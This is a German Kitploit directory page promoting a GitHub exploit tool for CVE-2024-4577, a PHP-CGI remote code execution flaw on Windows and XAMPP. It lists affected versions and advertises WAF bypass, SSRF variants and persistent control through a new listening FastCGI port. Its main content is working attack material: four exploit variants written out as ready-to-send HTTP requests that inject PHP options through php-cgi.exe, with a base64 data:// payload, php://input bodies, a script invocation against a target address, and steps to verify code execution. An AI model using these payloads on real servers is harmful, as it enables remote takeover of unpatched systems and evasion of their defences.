Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577-PHP-RCE — Exploit für CVE-2024-4577 PHP-CGI-RCE unter Windows, mit WAF-Bypass und SSRF-Unterstützung. Bietet mehrere Exploit-Varianten für Standard-, WAF- und SSRF-Szenarien. | Kitploit
Tools/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstests
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

Exploit für CVE-2024-4577 PHP-CGI-RCE unter Windows, mit WAF-Bypass und SSRF-Unterstützung. Bietet mehrere Exploit-Varianten für Standard-, WAF- und SSRF-Szenarien.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
5vor 2 JahrenNoch nicht geprüft
Teilen

CVE-2024-4577-PHP-RCE

Projektbeschreibung und Funktionsweise

  • Das weltweit erste Exploit für CVE-2024-4577 PHP-CGI RCE, das die PHP-Standardumgebung (XAMPP) nutzt.
  • Das weltweit erste CVE-2024-4577 PHP-CGI RCE-Exploit, das die standardmäßige PHP-Umgebung verwendet. Teilt Original-Exploit, unterstützt SSRF, unterstützt WAF-Bypass.
  • Ermöglicht RCE in der PHP-Standardumgebung. Prinzip: cgi.force_redirect + REDIRECT-STATUS.
  • Neues, originelles EXP, das Szenarien mit WAF-Bypass unterstützt. Prinzip: Aufbau eines FastCGI-Servers + FastCGI-Protokollkommunikation.
  • Neues, originelles EXP, das SSRF-Szenarien unterstützt. Prinzip: data://-Protokoll + GET-Anfrage.

Vorteile von EXP 1

  • RCE ohne allow_url_include, auto_prepend_file, auto_append_file. Kann beliebige Dateien und PHP-Dateien einbinden.
  • Enthält nicht die von WAF häufig blockierten Schlüsselwörter allow_url_include, auto_prepend_file, auto_append_file.
  • Die gesamte Kommunikation des FastCGI-Servers wird nicht von der WAF protokolliert.
  • Hört auf einem neuen Port, ermöglicht persistente Kontrolle des PHP-Servers, unabhängig von Apache und PHP.
  • Schwachstellenüberblick

    InformationInhalt
    SchwachstellennamePHP RCE
    SchwachstellennummerCVE-2024-4577
    RisikostufeHoch
    SchwachstellentypRCE
    SchwierigkeitsgradNiedrig

    Betroffene Versionen

    • PHP Windows-Version 8.3.0 <= betroffene Version < 8.3.8
    • PHP Windows-Version 8.2.0 <= betroffene Version < 8.2.20
    • PHP Windows-Version 8.1.0 <= betroffene Version < 8.1.29
    • PHP Windows-Version betroffene Version == 8.0.x
    • PHP Windows-Version betroffene Version == 7.x
    • PHP Windows-Version betroffene Version == 5.x
    • XAMPP Windows-Version 8.2.0 <= betroffene Version <= 8.2.12
    • XAMPP Windows-Version 8.1.0 <= betroffene Version <= 8.1.25
    • XAMPP Windows-Version betroffene Version == 8.0.x
    • XAMPP Windows-Version betroffene Version == 7.x
    • XAMPP Windows-Version betroffene Version == 5.x

    EXP 1

    Kann für WAF-Bypass-Szenarien + Standardszenarien verwendet werden:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Beispiel:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Kann für SSRF-Szenarien + Standardszenarien verwendet werden:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Kann für Standardszenarien verwendet werden:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Kann für Standardszenarien verwendet werden:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Reproduktion

    1. Serverumgebung:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. Server: XAMPP herunterladen und installieren:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    oder wählen Sie hier eine betroffene Version aus: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. Serverkonfiguration
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. Client: Verwenden des EXP

    Test mit dem obigen EXP durchführen

    1. Überprüfung

    Überprüfen, ob die Zeichenkette "TesT" oder der Inhalt der Datei system.ini auf dem Server zurückgegeben wird.

    Tool herunterladen